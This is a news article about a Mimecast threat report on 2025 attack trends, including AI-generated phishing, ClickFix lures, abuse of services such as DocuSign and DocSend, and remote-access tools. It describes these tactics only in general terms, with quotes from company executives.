Mimecast Report: AI Phishing and ClickFix Attacks Explode

2025 has been a terrific year for cyber criminals as AI-augmented phishing surged 500%, a new report reveals.

According to the latest threat intelligence report by Mimecast, the company caught over 9.3 billion cyber threats in the first nine months of 2025.

With AI, phishing campaigns and ClickFix schemes have become more sophisticated, leveraging trusted services to evade detection.

The report reveals that phishing now accounts for 77% of all attacks, which is up from 60% in 2024. 

“We’re seeing a clear evolution in attacker behaviour in 2025, headlined by an exponential rise in AI-driven threats,” said Ranjan Singh, Mimecast Chief Product & Technology Officer. 

“Financial platforms, regulatory agencies, and city governments have all been targeted by profit-driven ransomware groups and highly organised, state-sponsored adversaries. 

“Threat actors are doubling down on human-focused attacks and exploiting trusted business services as their primary means of intrusion, making employee awareness and resilient systems more essential than ever.” 

AI as a partner in cybercrime

Long gone are the days of spotting phishing emails by their ridiculous grammatical errors and ludicrous spelling mistakes. 

Generative AI now allows threat actors to craft flawless, compelling phishing emails that impersonate vendors, partners and employees. 

This has led to a dramatic rise in ClickFix schemes, AI-augmented phishing and Business Email Compromise (BEC). 

Mimecast has noted a significant increase in the sophistication of the social engineering attacks that exploit human vulnerabilities, especially with ClickFix Schemes. 

In such schemes, attackers use fake error messages or verification prompts to lure users into copying and pasting malicious commands on their own devices.

Attackers are Living Off Trusted Services (LOTS)

Cyber attacks exploiting human trust by using services and business tools that employees interact with daily are shown to be evolving.

Platforms like Adobe Pay, DocuSign and Salesforce are weaponised in their schemes, with the report showing that DocSend was the most abused service in 2025. 

Threat actors use legitimate, customised CAPTCHA services to not just trick victims, but also to slow threat detectors' ability to detect attacks.

Mimecast has detected over 900,000 unique CAPTCHA-protected URLs each month in the US and UK, linked to the notorious cybercrime group Scattered Spider. 

Ranjan says that threat actors are abandoning traditional malware in favour of legitimate Remote Monitoring and Management (RMM) tools like ScreenConnect, TeamViewer and AnyDesk.

“These legitimate tools provide persistent remote access while blending with authorised business software," he says. “They're often whitelisted, making detection exponentially harder than traditional malware.

“Email security has become so effective at catching malware, that attackers have completely changed tactics. They're no longer deploying malicious code, they're weaponising your trusted software.”

Multichannel attacks against the most vulnerable vector: the human

“Attacks always tend towards the most vulnerable vector, which is now the human”, says Chief Product Officer at Mimecast, Rob Juncker. 

To take full advantage of human vulnerabilities, attackers coordinate across various communication channels to evade detection. 

A primary example is a phishing email with an embedded phone number which the victim can connect to, reducing the visibility to threat detectors. 

AI generated synthetic voices and deepfakes are then used by attackers to impersonate executives or to lure victims into IT support scams.

Rob says that elevating the conversation from email security, to securing the entire human is a logical evolution. 

“When it comes to human risk, one of the biggest challenges is figuring out who your riskiest users are,” he notes. “Our research showed that 8% of your users lead to 80% of your risk.

“We’ve got to better secure the users from Gen AI attacks which are firing laser targeted, accurate, phishing attempts at those users.”

Tailored attacks against high-value sectors 

The Mimecast report shows that professional education, IT software, telecommunications, real estate and legal organisations experience a much higher volume of impersonation attacks. 

Of these sectors, real estate was shown to have suffered particularly higher phishing attack attempts. 

The report uncovered phishing campaigns using email impersonation and large-scale credential harvesting, that were used to target specific hospitality industry professionals. 

“Cyber defence can no longer be treated solely as a technology issue,” says Mimecast Chief Information Security Officer, Leslie Nielsen.

“It’s equally about people and organisational resilience. 

“Countering these threats requires organisations to adapt by preparing employees to recognise suspicious activity and leveraging tools like AI internally to enhance both business workflows and security operations.

“As threat actors continue to target the human layer through deception, trust exploitation and multichannel coordination, building awareness and resilient response capabilities becomes critical.”